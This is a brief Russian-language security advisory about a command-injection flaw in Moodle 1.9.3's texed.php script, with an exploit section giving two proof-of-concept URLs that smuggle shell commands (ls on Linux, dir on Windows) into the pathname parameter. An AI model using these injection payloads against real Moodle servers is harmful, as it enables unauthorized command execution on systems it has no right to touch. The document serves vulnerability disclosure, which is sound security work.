Программа: Moodle 1.9.3
Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных сценарием texed.php. Удаленный пользователь может выполнить произвольные
команды на целевой системе.
Эксплоит:
На Linux:
http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;echo+"
На Windows:
http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+dir+||+echo+